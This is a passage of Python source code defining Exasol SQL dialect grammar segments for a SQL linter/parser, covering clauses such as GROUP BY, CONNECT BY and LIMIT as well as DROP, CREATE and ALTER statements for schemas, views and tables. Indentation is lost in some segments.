"VALUES",
Delimited(
OneOf(
Bracketed(
Delimited(
Ref("LiteralGrammar"),
Ref("IntervalExpressionSegment"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
ephemeral_name="ValuesClauseElements",
)
),
Delimited(
# e.g. SELECT * FROM (VALUES 1,2,3);
Ref("LiteralGrammar"),
Ref("BareFunctionSegment"),
Ref("FunctionSegment"),
),
),
),
Ref("AliasExpressionSegment", optional=True),
)
@exasol_dialect.segment()
class ValuesRangeClauseSegment(BaseSegment):
    """A `VALUES BETWEEN` clause within a `SELECT` statement.

    Generates a numeric range, e.g. `VALUES BETWEEN 1 AND 10 WITH STEP 2`.
    Supported since Exasol 7.1!
    """
    type = "values_range_clause"
    match_grammar = Sequence(
        "VALUES",
        "BETWEEN",
        Ref("NumericLiteralSegment"),
        "AND",
        Ref("NumericLiteralSegment"),
        # Optional step size; defaults are decided by the database, not here.
        Sequence("WITH", "STEP", Ref("NumericLiteralSegment"), optional=True),
    )
@exasol_dialect.segment(replace=True)
class SetOperatorSegment(BaseSegment):
    """A set operator: UNION [ALL], INTERSECT, MINUS or EXCEPT.

    Only UNION may carry an optional ALL; MINUS and EXCEPT are matched as
    interchangeable alternatives.
    """
    type = "set_operator"
    match_grammar = OneOf(
        Sequence("UNION", Ref.keyword("ALL", optional=True)),
        "INTERSECT",
        OneOf("MINUS", "EXCEPT"),
    )
@exasol_dialect.segment()
class ConnectByClauseSegment(BaseSegment):
"""`CONNECT BY` clause within a select statement."""
type = "connect_by_clause"
match_grammar = StartsWith(
OneOf(
Sequence("CONNECT", "BY"),
Sequence("START", "WITH"),
),
terminator=OneOf(
"PREFERRING",
Sequence("GROUP", "BY"),
"QUALIFY",
Sequence("ORDER", "BY"),
"LIMIT",
Ref("SetOperatorSegment"),
),
enforce_whitespace_preceding_terminator=True,
)
parse_grammar = OneOf(
Sequence(
"CONNECT",
"BY",
Ref.keyword("NOCYCLE", optional=True),
Delimited(
Ref("ExpressionSegment"),
delimiter="AND",
terminator="START",
),
Sequence("START", "WITH", Ref("ExpressionSegment"), optional=True),
),
Sequence(
"START",
"WITH",
Ref("ExpressionSegment"),
"CONNECT",
"BY",
Ref.keyword("NOCYCLE", optional=True),
Delimited(Ref("ExpressionSegment"), delimiter="AND"),
),
)
@exasol_dialect.segment(replace=True)
class GroupByClauseSegment(BaseSegment):
"""A `GROUP BY` clause like in `SELECT`."""
type = "groupby_clause"
match_grammar = StartsWith(
Sequence("GROUP", "BY"),
terminator=OneOf(
Sequence("ORDER", "BY"),
"LIMIT",
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
enforce_whitespace_preceding_terminator=True,
)
parse_grammar = Sequence(
"GROUP",
"BY",
Indent,
Delimited(
OneOf(
Ref("ColumnReferenceSegment"),
# Can `GROUP BY 1`
Ref("NumericLiteralSegment"),
# Can `GROUP BY coalesce(col, 1)`
Ref("ExpressionSegment"),
Ref("CubeRollupClauseSegment"),
Ref("GroupingSetsClauseSegment"),
Bracketed(), # Allows empty parentheses
),
terminator=OneOf(
Sequence("ORDER", "BY"),
"LIMIT",
"HAVING",
"QUALIFY",
Ref("SetOperatorSegment"),
),
),
Dedent,
)
@exasol_dialect.segment()
class CubeRollupClauseSegment(BaseSegment):
"""`CUBE` / `ROLLUP` clause within the `GROUP BY` clause."""
type = "cube_rollup_clause"
match_grammar = StartsWith(
OneOf("CUBE", "ROLLUP"),
terminator=OneOf(
"HAVING",
"QUALIFY",
Sequence("ORDER", "BY"),
"LIMIT",
Ref("SetOperatorSegment"),
),
)
parse_grammar = Sequence(
OneOf("CUBE", "ROLLUP"),
Bracketed(
Ref("GroupingExpressionList"),
),
)
@exasol_dialect.segment()
class GroupingSetsClauseSegment(BaseSegment):
"""`GROUPING SETS` clause within the `GROUP BY` clause."""
type = "grouping_sets_clause"
match_grammar = StartsWith(
Sequence("GROUPING", "SETS"),
terminator=OneOf(
"HAVING",
"QUALIFY",
Sequence("ORDER", "BY"),
"LIMIT",
Ref("SetOperatorSegment"),
),
)
parse_grammar = Sequence(
"GROUPING",
"SETS",
Bracketed(
Delimited(
Ref("CubeRollupClauseSegment"),
Ref("GroupingExpressionList"),
Bracketed(), # Allows empty parentheses
)
),
)
@exasol_dialect.segment()
class GroupingExpressionList(BaseSegment):
    """Grouping expression list within `CUBE` / `ROLLUP` `GROUPING SETS`.

    A comma-delimited list where each element is either a single expression
    or a parenthesized group of expressions.
    """
    type = "grouping_expression_list"
    match_grammar = Delimited(
        OneOf(
            Bracketed(Delimited(Ref("ExpressionSegment"))),
            Ref("ExpressionSegment"),
        )
    )
@exasol_dialect.segment()
class QualifyClauseSegment(BaseSegment):
    """`QUALIFY` clause within `SELECT` (filters on window-function results)."""
    type = "qualify_clause"
    # Match runs from QUALIFY up to whichever trailing clause follows it.
    match_grammar = StartsWith(
        "QUALIFY",
        terminator=OneOf(
            Sequence("ORDER", "BY"),
            "LIMIT",
            Ref("SetOperatorSegment"),
        ),
    )
    parse_grammar = Sequence("QUALIFY", Ref("ExpressionSegment"))
@exasol_dialect.segment(replace=True)
class LimitClauseSegment(BaseSegment):
    """A `LIMIT` clause like in `SELECT`.

    Supports both EXASOL spellings: `LIMIT offset, count` and
    `LIMIT count [OFFSET offset]`.
    """
    type = "limit_clause"
    match_grammar = StartsWith("LIMIT")
    parse_grammar = Sequence(
        "LIMIT",
        OneOf(
            Sequence(  # offset, count
                Ref("NumericLiteralSegment"),
                Ref("CommaSegment"),
                Ref("NumericLiteralSegment"),
            ),
            Sequence(  # count [OFFSET offset]
                Ref("NumericLiteralSegment"),
                Sequence("OFFSET", Ref("NumericLiteralSegment"), optional=True),
            ),
        ),
    )
############################
# DROP
############################
@exasol_dialect.segment(replace=True)
class DropStatementSegment(BaseSegment):
    """A `DROP` statement: dispatcher to the specific EXASOL `DROP` variants."""
    type = "drop_statement"
    # NOTE(review): flagged as DCL rather than DDL here - confirm this
    # classification is intentional; it is shared by the variants below.
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = StartsWith("DROP")
    # Delegate parsing to the variant segments; each handles its own options.
    parse_grammar = OneOf(
        Ref("DropWithouOptionsStatementSegment"),
        Ref("DropCascadeStatementSegment"),
        Ref("DropCascadeRestrictStatementSegment"),
        Ref("DropSchemaStatementSegment"),
        Ref("DropTableStatementSegment"),
    )
@exasol_dialect.segment()
class DropWithouOptionsStatementSegment(BaseSegment):
    """A `DROP` statement without any options.

    Covers DROP CONNECTION, DROP [ADAPTER] SCRIPT and DROP CONSUMER GROUP.
    NOTE: the class name is misspelled ("Withou" -> "Without") but cannot be
    renamed here because DropStatementSegment references it by this name.
    """
    type = "drop_wo_options"
    is_ddl = False
    is_dml = False
    is_dql = False
    is_dcl = True
    match_grammar = Sequence(
        "DROP",
        OneOf(
            "CONNECTION",
            Sequence(
                Ref.keyword("ADAPTER", optional=True),
                "SCRIPT",
            ),
            Sequence("CONSUMER", "GROUP"),
        ),
        Ref("IfExistsGrammar", optional=True),
        Ref("ObjectReferenceSegment"),
    )
@exasol_dialect.segment()
class DropCascadeStatementSegment(BaseSegment):
"""A `DROP` statement with CASCADE option.
https://docs.exasol.com/sql/drop_role.htm
https://docs.exasol.com/sql/drop_user.htm
"""
type = "drop_cascade"
is_ddl = False
is_dml = False
is_dql = False
is_dcl = True
match_grammar = Sequence(
"DROP",
OneOf(
"USER",
"ROLE",
),
Ref("IfExistsGrammar", optional=True),
Ref("ObjectReferenceSegment"),
Ref.keyword("CASCADE", optional=True),
)
@exasol_dialect.segment()
class DropCascadeRestrictStatementSegment(BaseSegment):
"""A `DROP` statement with CASCADE and RESTRICT option.
https://docs.exasol.com/sql/drop_view.htm
https://docs.exasol.com/sql/drop_function.htm
"""
type = "drop_cascade_restrict"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = Sequence(
"DROP",
OneOf(
"VIEW",
"FUNCTION",
),
Ref("IfExistsGrammar", optional=True),
Ref("ObjectReferenceSegment"),
OneOf("RESTRICT", "CASCADE", optional=True),
)
############################
# SCHEMA
############################
@exasol_dialect.segment(replace=True)
class CreateSchemaStatementSegment(BaseSegment):
"""A `CREATE SCHEMA` statement.
https://docs.exasol.com/sql/create_schema.htm
"""
type = "create_schema_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("CREATE", "SCHEMA"))
parse_grammar = Sequence(
"CREATE",
"SCHEMA",
Ref("IfNotExistsGrammar", optional=True),
Ref("SchemaReferenceSegment"),
)
@exasol_dialect.segment()
class CreateVirtualSchemaStatementSegment(BaseSegment):
"""A `CREATE VIRUTAL SCHEMA` statement.
https://docs.exasol.com/sql/create_schema.htm
"""
type = "create_virtual_schema_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("CREATE", "VIRTUAL", "SCHEMA"))
parse_grammar = Sequence(
"CREATE",
"VIRTUAL",
"SCHEMA",
Ref("IfNotExistsGrammar", optional=True),
Ref("SchemaReferenceSegment"),
"USING",
Ref("ObjectReferenceSegment"),
Ref.keyword("WITH", optional=True),
AnyNumberOf(
Sequence(
Ref("ParameterNameSegment"),
Ref("EqualsSegment"),
Ref("LiteralGrammar"),
)
),
)
@exasol_dialect.segment()
class AlterSchemaStatementSegment(BaseSegment):
"""A `ALTER VIRUTAL SCHEMA` statement.
https://docs.exasol.com/sql/alter_schema.htm
"""
type = "alter_schema_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("ALTER", "SCHEMA"))
parse_grammar = Sequence(
"ALTER",
"SCHEMA",
Ref("SchemaReferenceSegment"),
OneOf(
Sequence(
"SET",
"RAW_SIZE_LIMIT",
Ref("EqualsSegment"),
AnyNumberOf(Ref("NumericLiteralSegment"), Ref("StarSegment")),
),
Sequence("CHANGE", "OWNER", Ref("SchemaReferenceSegment")),
),
)
@exasol_dialect.segment()
class AlterVirtualSchemaStatementSegment(BaseSegment):
"""A `ALTER VIRUTAL SCHEMA` statement.
https://docs.exasol.com/sql/alter_schema.htm
"""
type = "alter_virtual_schema_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(Sequence("ALTER", "VIRTUAL", "SCHEMA"))
parse_grammar = Sequence(
"ALTER",
"VIRTUAL",
"SCHEMA",
Ref("SchemaReferenceSegment"),
OneOf(
Sequence(
"SET",
AnyNumberOf(
Sequence(
Ref("ColumnReferenceSegment"),
Ref("EqualsSegment"),
Ref("LiteralGrammar"),
)
),
),
Sequence(
"REFRESH",
Sequence(
"TABLES",
Delimited(Ref("TableReferenceSegment")),
optional=True,
),
),
Sequence("CHANGE", "OWNER", Ref("NakedIdentifierSegment")),
),
)
@exasol_dialect.segment(replace=True)
class DropSchemaStatementSegment(BaseSegment):
"""A `DROP` statement for EXASOL schema.
https://docs.exasol.com/sql/drop_schema.htm
"""
type = "drop_schema"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = Sequence(
"DROP",
Ref.keyword("FORCE", optional=True),
Ref.keyword("VIRTUAL", optional=True),
"SCHEMA",
Ref("IfExistsGrammar", optional=True),
Ref("SchemaReferenceSegment"),
OneOf("RESTRICT", Ref.keyword("CASCADE", optional=True), optional=True),
)
############################
# VIEW
############################
@exasol_dialect.segment()
class ViewReferenceSegment(ansi_dialect.get_segment("ObjectReferenceSegment")):  # type: ignore
    """A reference to a view (reuses the ANSI object-reference grammar)."""
    type = "view_reference"
@exasol_dialect.segment(replace=True)
class CreateViewStatementSegment(BaseSegment):
"""A `CREATE VIEW` statement.
https://docs.exasol.com/sql/create_view.htm
"""
type = "create_view_statement"
is_ddl = True
is_dml = False
is_dql = False
is_dcl = False
match_grammar = StartsWith(
Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref.keyword("FORCE", optional=True),
"VIEW",
)
)
parse_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref.keyword("FORCE", optional=True),
"VIEW",
Ref("ViewReferenceSegment"),
Bracketed(
Delimited(
Sequence(
Ref("ColumnReferenceSegment"),
Ref("CommentIsGrammar", optional=True),
),
),
optional=True,
),
"AS",
OneOf(
Bracketed(Ref("SelectableGrammar")),
Ref("SelectableGrammar"),
),
Ref("CommentIsGrammar", optional=True),
# TODO: (...) COMMENT IS '...' works, without brackets doesn't work
# COMMENT is matched as an identifier...
)
############################
# TABLE
############################
@exasol_dialect.segment(replace=True)
class CreateTableStatementSegment(BaseSegment):
    """A `CREATE TABLE` statement.

    https://docs.exasol.com/sql/create_table.htm
    """

    type = "create_table_statement"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith(
        Sequence("CREATE", Ref("OrReplaceGrammar", optional=True), "TABLE")
    )
    parse_grammar = Sequence(
        "CREATE",
        Ref("OrReplaceGrammar", optional=True),
        "TABLE",
        Ref("IfNotExistsGrammar", optional=True),
        Ref("TableReferenceSegment"),
        # Three mutually exclusive table body forms:
        OneOf(
            # Columns and comment syntax:
            Bracketed(
                Sequence(
                    # One or more comma-separated column/constraint/LIKE items...
                    Ref("TableContentDefinitionSegment"),
                    AnyNumberOf(
                        Sequence(
                            Ref("CommaSegment"),
                            Ref("TableContentDefinitionSegment"),
                        ),
                    ),
                    # ...optionally followed by DISTRIBUTE BY / PARTITION BY.
                    Sequence(
                        Ref("CommaSegment"),
                        Ref("TableDistributionPartitonClause"),
                        optional=True,
                    ),
                ),
            ),
            # Create AS syntax:
            Sequence(
                "AS",
                Ref("SelectableGrammar"),
                Sequence(
                    # TODO: this only works if there are brackets
                    # around the selectable grammar. this should even
                    # work without brackets
                    "WITH",
                    Ref.keyword("NO", optional=True),
                    "DATA",
                    optional=True,
                ),
            ),
            # Create like syntax
            Ref("CreateTableLikeClauseSegment"),
        ),
        Ref("CommentIsGrammar", optional=True),
    )
@exasol_dialect.segment()
class TableContentDefinitionSegment(BaseSegment):
    """The table content definition.

    One item of a bracketed `CREATE TABLE` body: a column definition,
    an out-of-line constraint, or a LIKE clause.
    """

    type = "table_content_definition"
    match_grammar = OneOf(
        Ref("ColumnDefinitionSegment"),
        Ref("TableOutOfLineConstraintSegment"),
        Ref("CreateTableLikeClauseSegment"),
    )
@exasol_dialect.segment()
class ColumnDatatypeSegment(BaseSegment):
    """Sequence of column name and datatype definition (e.g. `id DECIMAL(18)`)."""

    type = "column_datatype_definition"
    match_grammar = Sequence(
        Ref("SingleIdentifierGrammar"),
        Ref("DatatypeSegment"),
    )
@exasol_dialect.segment(replace=True)
class DatatypeSegment(BaseSegment):
    """A data type segment.

    Supports all Exasol datatypes and their aliases
    https://docs.exasol.com/sql_references/data_types/datatypedetails.htm
    https://docs.exasol.com/sql_references/data_types/datatypealiases.htm
    .
    """

    type = "data_type"
    match_grammar = OneOf(
        # Numeric Data Types
        Sequence(
            OneOf("DECIMAL", "DEC", "NUMBER", "NUMERIC"),
            # Optional (precision[, scale]).
            Bracketed(
                Ref("NumericLiteralSegment"),
                Sequence(
                    Ref("CommaSegment"), Ref("NumericLiteralSegment"), optional=True
                ),
                optional=True,
            ),
        ),
        "BIGINT",
        Sequence("DOUBLE", Ref.keyword("PRECISION", optional=True)),
        "FLOAT",
        "INT",
        "INTEGER",
        "REAL",
        "SHORTINT",
        "TINYINT",
        "SMALLINT",
        # Boolean
        OneOf("BOOLEAN", "BOOL"),
        # Date/time
        OneOf(
            "DATE",
            Sequence(
                "TIMESTAMP", Sequence("WITH", "LOCAL", "TIME", "ZONE", optional=True)
            ),
        ),
        # Interval types: YEAR [(p)] TO MONTH / DAY [(p)] TO SECOND [(fp)]
        Sequence(
            "INTERVAL",
            "YEAR",
            Bracketed(Ref("NumericLiteralSegment"), optional=True),
            "TO",
            "MONTH",
        ),
        Sequence(
            "INTERVAL",
            "DAY",
            Bracketed(Ref("NumericLiteralSegment"), optional=True),
            "TO",
            "SECOND",
            Bracketed(Ref("NumericLiteralSegment"), optional=True),
        ),
        Sequence(
            "GEOMETRY",
            Bracketed(Ref("NumericLiteralSegment"), optional=True),
        ),
        # HASHTYPE [(n [BIT|BYTE])]
        Sequence(
            "HASHTYPE",
            Bracketed(
                Ref("NumericLiteralSegment"),
                OneOf("BIT", "BYTE", optional=True),
                optional=True,
            ),
        ),
        # Character types, optionally followed by a CHARACTER SET clause.
        Sequence(
            OneOf(
                Sequence(
                    OneOf(
                        Sequence("CHAR", Ref.keyword("VARYING", optional=True)),
                        "VARCHAR",
                        "VARCHAR2",
                        "NCHAR",
                        "NVARCHAR",
                        "NVARCHAR2",
                    ),
                    # Optional (size [CHAR|BYTE]).
                    Bracketed(
                        Ref("NumericLiteralSegment"),
                        OneOf("CHAR", "BYTE", optional=True),
                        optional=True,
                    ),
                ),
                Sequence("LONG", "VARCHAR"),
                Sequence(
                    "CHARACTER",
                    Sequence(
                        OneOf(Sequence("LARGE", "OBJECT"), "VARYING", optional=True),
                        Bracketed(Ref("NumericLiteralSegment"), optional=True),
                    ),
                ),
                Sequence(
                    "CLOB",
                    Bracketed(Ref("NumericLiteralSegment"), optional=True),
                ),
            ),
            Ref("CharCharacterSetSegment", optional=True),
        ),
    )
@exasol_dialect.segment(replace=True)
class ColumnDefinitionSegment(BaseSegment):
    """Column definition within a `CREATE / ALTER TABLE` statement.

    Column name + datatype, optionally followed by column options
    (DEFAULT / IDENTITY / inline constraint / comment).
    """

    type = "column_definition"
    match_grammar = Sequence(
        Ref("ColumnDatatypeSegment"),
        Ref("ColumnConstraintSegment", optional=True),
    )
@exasol_dialect.segment(replace=True)
class ColumnConstraintSegment(BaseSegment):
    """A column option; each CREATE TABLE column can have 0 or more."""

    type = "column_option"
    match_grammar = Sequence(
        # A column may carry either a DEFAULT expression or an IDENTITY
        # clause (not both), then an inline constraint and a comment.
        OneOf(
            Sequence(
                "DEFAULT", OneOf(Ref("LiteralGrammar"), Ref("BareFunctionSegment"))
            ),
            Sequence(
                # IDENTITY(1000) or IDENTITY 1000 or IDENTITY
                "IDENTITY",
                OptionallyBracketed(Ref("NumericLiteralSegment"), optional=True),
            ),
            optional=True,
        ),
        Ref("TableInlineConstraintSegment", optional=True),
        Ref("CommentIsGrammar", optional=True),
    )
@exasol_dialect.segment()
class TableInlineConstraintSegment(BaseSegment):
    """Inline table constraint for CREATE / ALTER TABLE."""

    type = "table_constraint_definition"
    # Constraint starts at one of these keywords and ends at COMMENT, a
    # comma (next column) or the closing bracket of the column list.
    match_grammar = StartsWith(
        OneOf("CONSTRAINT", "NOT", "NULL", "PRIMARY", "FOREIGN"),
        terminator=OneOf("COMMENT", Ref("CommaSegment"), Ref("EndBracketSegment")),
    )
    parse_grammar = Sequence(
        Sequence(
            "CONSTRAINT",
            # Optional constraint name (at most one identifier).
            AnyNumberOf(
                Ref("NakedIdentifierSegment"),
                max_times=1,
                min_times=0,
                # exclude UNRESERVED_KEYWORDS which could used as NakedIdentifier
                # to make e.g. `id NUMBER CONSTRAINT PRIMARY KEY` work (which is equal to just
                # `id NUMBER PRIMARY KEY`)
                exclude=OneOf("NOT", "NULL", "PRIMARY", "FOREIGN"),
            ),
            optional=True,
        ),
        OneOf(
            # (NOT) NULL
            Sequence(Ref.keyword("NOT", optional=True), "NULL"),
            # PRIMARY KEY
            Ref("PrimaryKeyGrammar"),
            # FOREIGN KEY
            Ref("ForeignKeyReferencesClauseGrammar"),
        ),
        Ref("TableConstraintEnableDisableGrammar", optional=True),
    )
@exasol_dialect.segment()
class TableOutOfLineConstraintSegment(BaseSegment):
    """Out of line table constraint for CREATE / ALTER TABLE."""

    type = "table_constraint_definition"
    match_grammar = StartsWith(
        OneOf("CONSTRAINT", "PRIMARY", "FOREIGN"),
        terminator=OneOf(Ref("CommaSegment"), "DISTRIBUTE", "PARTITION"),
    )
    parse_grammar = Sequence(
        Sequence(
            "CONSTRAINT",
            # Optional constraint name (at most one identifier).
            AnyNumberOf(
                Ref("NakedIdentifierSegment"),
                max_times=1,
                min_times=0,
                # exclude UNRESERVED_KEYWORDS which could used as NakedIdentifier
                # to make e.g. `id NUMBER, CONSTRAINT PRIMARY KEY(id)` work (which is equal to just
                # `id NUMBER, PRIMARY KEY(id)`)
                exclude=OneOf("NOT", "NULL", "PRIMARY", "FOREIGN"),
            ),
            optional=True,
        ),
        OneOf(
            # PRIMARY KEY
            Sequence(
                Ref("PrimaryKeyGrammar"),
                Ref("BracketedColumnReferenceListGrammar"),
            ),
            # FOREIGN KEY
            Sequence(
                Ref("ForeignKeyGrammar"),
                Ref("BracketedColumnReferenceListGrammar"),
                Ref("ForeignKeyReferencesClauseGrammar"),
            ),
        ),
        Ref("TableConstraintEnableDisableGrammar", optional=True),
    )
@exasol_dialect.segment()
class CreateTableLikeClauseSegment(BaseSegment):
    """`CREATE TABLE` LIKE clause."""

    type = "table_like_clause"
    match_grammar = Sequence(
        "LIKE",
        Ref("TableReferenceSegment"),
        # Optional list of columns to copy, each with an optional alias.
        Bracketed(
            AnyNumberOf(
                Sequence(
                    Ref("SingleIdentifierGrammar"),
                    Ref("AliasExpressionSegment", optional=True),
                ),
                Ref("CommaSegment", optional=True),
                min_times=1,
            ),
            optional=True,
        ),
        # Controls whether defaults / identity / comments are copied.
        Sequence(OneOf("INCLUDING", "EXCLUDING"), "DEFAULTS", optional=True),
        Sequence(OneOf("INCLUDING", "EXCLUDING"), "IDENTITY", optional=True),
        Sequence(OneOf("INCLUDING", "EXCLUDING"), "COMMENTS", optional=True),
    )
@exasol_dialect.segment()
class TableDistributionPartitonClause(BaseSegment):
    """`CREATE / ALTER TABLE` distribution / partition clause.

    DISTRIBUTE/PARTITION clause doesn't accept the identifiers in brackets
    """

    # NOTE: class name keeps the historical "Partiton" spelling because it
    # is referenced by that name elsewhere in this dialect.
    type = "table_distribution_partition_clause"
    # The two sub-clauses may appear in either order, optionally
    # comma-separated.
    match_grammar = OneOf(
        Sequence(
            Ref("TableDistributeByGrammar"),
            Ref("CommaSegment", optional=True),
            Ref("TablePartitionByGrammar", optional=True),
        ),
        Sequence(
            Ref("TablePartitionByGrammar"),
            Ref("CommaSegment", optional=True),
            Ref("TableDistributeByGrammar", optional=True),
        ),
    )
@exasol_dialect.segment(replace=True)
class AlterTableStatementSegment(BaseSegment):
    """`ALTER TABLE` statement.

    Dispatches to one of the three Exasol ALTER TABLE variants:
    column changes, constraint changes, or distribution/partition changes.
    """

    type = "alter_table_statement"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith(Sequence("ALTER", "TABLE"))
    parse_grammar = OneOf(
        Ref("AlterTableColumnSegment"),
        Ref("AlterTableConstraintSegment"),
        Ref("AlterTableDistributePartitionSegment"),
    )
@exasol_dialect.segment()
class AlterTableColumnSegment(BaseSegment):
    """A `ALTER TABLE` statement to add, modify, drop or rename columns.

    https://docs.exasol.com/sql/alter_table(column).htm
    """

    type = "alter_table_column_statement"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = Sequence(
        "ALTER",
        "TABLE",
        Ref("TableReferenceSegment"),
        # One of the column-level actions (ADD / DROP / MODIFY / RENAME / ALTER).
        OneOf(
            Ref("AlterTableAddColumnSegment"),
            Ref("AlterTableDropColumnSegment"),
            Ref("AlterTableModifyColumnSegment"),
            Ref("AlterTableRenameColumnSegment"),
            Ref("AlterTableAlterColumnSegment"),
        ),
    )
@exasol_dialect.segment()
class AlterTableAddColumnSegment(BaseSegment):
    """ALTER TABLE ADD.. (add a column, with or without brackets)."""

    type = "alter_table_add_column"
    match_grammar = Sequence(
        "ADD",
        Ref.keyword("COLUMN", optional=True),
        Ref("IfNotExistsGrammar", optional=True),
        OptionallyBracketed(Ref("ColumnDefinitionSegment")),
    )
@exasol_dialect.segment()
class AlterTableDropColumnSegment(BaseSegment):
    """ALTER TABLE DROP.. (drop a column, optionally cascading constraints)."""

    type = "alter_table_drop_column"
    match_grammar = Sequence(
        "DROP",
        Ref.keyword("COLUMN", optional=True),
        Ref("IfExistsGrammar", optional=True),
        Ref("SingleIdentifierGrammar"),
        Sequence("CASCADE", "CONSTRAINTS", optional=True),
    )
@exasol_dialect.segment()
class AlterTableModifyColumnSegment(BaseSegment):
    """ALTER TABLE MODIFY.. (change a column's datatype and/or options)."""

    type = "alter_table_modify_column"
    match_grammar = Sequence(
        "MODIFY",
        Ref.keyword("COLUMN", optional=True),
        OptionallyBracketed(
            Ref("SingleIdentifierGrammar"),
            # Datatype and constraint are each optional - at least one would
            # normally be present in valid SQL.
            Ref("DatatypeSegment", optional=True),
            Ref("ColumnConstraintSegment", optional=True),
        ),
    )
@exasol_dialect.segment()
class AlterTableRenameColumnSegment(BaseSegment):
    """ALTER TABLE RENAME.. (rename a column: old name TO new name)."""

    type = "alter_table_rename_column"
    match_grammar = Sequence(
        "RENAME",
        "COLUMN",
        Ref("SingleIdentifierGrammar"),
        "TO",
        Ref("SingleIdentifierGrammar"),
    )
@exasol_dialect.segment()
class AlterTableAlterColumnSegment(BaseSegment):
    """ALTER TABLE ALTER.. (SET/DROP a column's IDENTITY or DEFAULT)."""

    type = "alter_table_alter_column"
    match_grammar = Sequence(
        "ALTER",
        Ref.keyword("COLUMN", optional=True),
        Ref("SingleIdentifierGrammar"),
        OneOf(
            Sequence(
                "SET",
                OneOf(
                    Sequence(
                        # IDENTITY(1000) or IDENTITY 1000
                        "IDENTITY",
                        OptionallyBracketed(Ref("NumericLiteralSegment")),
                    ),
                    Sequence(
                        "DEFAULT",
                        OneOf(Ref("LiteralGrammar"), Ref("BareFunctionSegment")),
                    ),
                ),
            ),
            Sequence("DROP", OneOf("IDENTITY", "DEFAULT")),
        ),
    )
@exasol_dialect.segment()
class AlterTableConstraintSegment(BaseSegment):
    """A `ALTER TABLE` statement to add, modify, drop or rename constraints.

    https://docs.exasol.com/sql/alter_table(constraints).htm
    """

    type = "alter_table_constraint_statement"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = Sequence(
        "ALTER",
        "TABLE",
        Ref("TableReferenceSegment"),
        OneOf(
            # ADD <out-of-line constraint>
            Sequence("ADD", Ref("TableOutOfLineConstraintSegment")),
            # MODIFY [CONSTRAINT name | PRIMARY KEY] ENABLE/DISABLE
            Sequence(
                "MODIFY",
                OneOf(
                    Sequence("CONSTRAINT", Ref("SingleIdentifierGrammar")),
                    Ref("PrimaryKeyGrammar"),
                ),
                Ref("TableConstraintEnableDisableGrammar"),
            ),
            # DROP [CONSTRAINT [IF EXISTS] name | PRIMARY KEY]
            Sequence(
                "DROP",
                OneOf(
                    Sequence(
                        "CONSTRAINT",
                        Ref("IfExistsGrammar", optional=True),
                        Ref("SingleIdentifierGrammar"),
                    ),
                    Ref("PrimaryKeyGrammar"),
                ),
            ),
            # RENAME CONSTRAINT old TO new
            Sequence(
                "RENAME",
                "CONSTRAINT",
                Ref("SingleIdentifierGrammar"),
                "TO",
                Ref("SingleIdentifierGrammar"),
            ),
        ),
    )
@exasol_dialect.segment()
class AlterTableDistributePartitionSegment(BaseSegment):
    """A `ALTER TABLE` statement to add or drop distribution / partition keys.

    https://docs.exasol.com/sql/alter_table(distribution_partitioning).htm
    """

    type = "alter_table_distribute_partition_statement"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = Sequence(
        "ALTER",
        "TABLE",
        Ref("TableReferenceSegment"),
        OneOf(
            # Add/replace keys.
            Ref("TableDistributionPartitonClause"),
            # DROP [DISTRIBUTION [AND PARTITION] | PARTITION [AND DISTRIBUTION]] KEYS
            Sequence(
                "DROP",
                OneOf(
                    Sequence(
                        Ref.keyword("DISTRIBUTION"),
                        Ref.keyword("AND", optional=True),
                        Ref.keyword("PARTITION", optional=True),
                    ),
                    Sequence(
                        Ref.keyword("PARTITION"),
                        Ref.keyword("AND", optional=True),
                        Ref.keyword("DISTRIBUTION", optional=True),
                    ),
                ),
                "KEYS",
            ),
        ),
    )
@exasol_dialect.segment()
class DropTableStatementSegment(BaseSegment):
    """A `DROP` table statement.

    https://docs.exasol.com/sql/drop_table.htm
    """

    type = "drop_table"
    match_grammar = StartsWith(Sequence("DROP", "TABLE"))
    parse_grammar = Sequence(
        "DROP",
        "TABLE",
        Ref("IfExistsGrammar", optional=True),
        Ref("TableReferenceSegment"),
        # Either RESTRICT or CASCADE (for dependent views etc.).
        OneOf("RESTRICT", Ref.keyword("CASCADE", optional=True), optional=True),
        # CASCADE CONSTRAINTS drops referencing foreign keys.
        Sequence("CASCADE", "CONSTRAINTS", optional=True),
    )
############################
# RENAME
############################
@exasol_dialect.segment()
class RenameStatementSegment(BaseSegment):
    """`RENAME` statement.

    https://docs.exasol.com/sql/rename.htm
    """

    type = "rename_statement"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith("RENAME")
    parse_grammar = Sequence(
        "RENAME",
        # Optional object class; without it Exasol infers the object type.
        OneOf(
            "SCHEMA",
            "TABLE",
            "VIEW",
            "FUNCTION",
            "SCRIPT",
            "USER",
            "ROLE",
            "CONNECTION",
            Sequence("CONSUMER", "GROUP"),
            optional=True,
        ),
        Ref("ObjectReferenceSegment"),
        "TO",
        Ref("ObjectReferenceSegment"),
    )
############################
# COMMENT
############################
@exasol_dialect.segment()
class CommentStatementSegment(BaseSegment):
    """`COMMENT` statement.

    https://docs.exasol.com/sql/comment.htm
    """

    type = "comment_statement"
    is_ddl = True
    is_dml = False
    is_dql = False
    is_dcl = False
    match_grammar = StartsWith(Sequence("COMMENT", "ON"))
    parse_grammar = Sequence(
        "COMMENT",
        "ON",
        OneOf(
            # Table form: can set a table comment and/or per-column comments.
            Sequence(
                Ref.keyword("TABLE", optional=True),
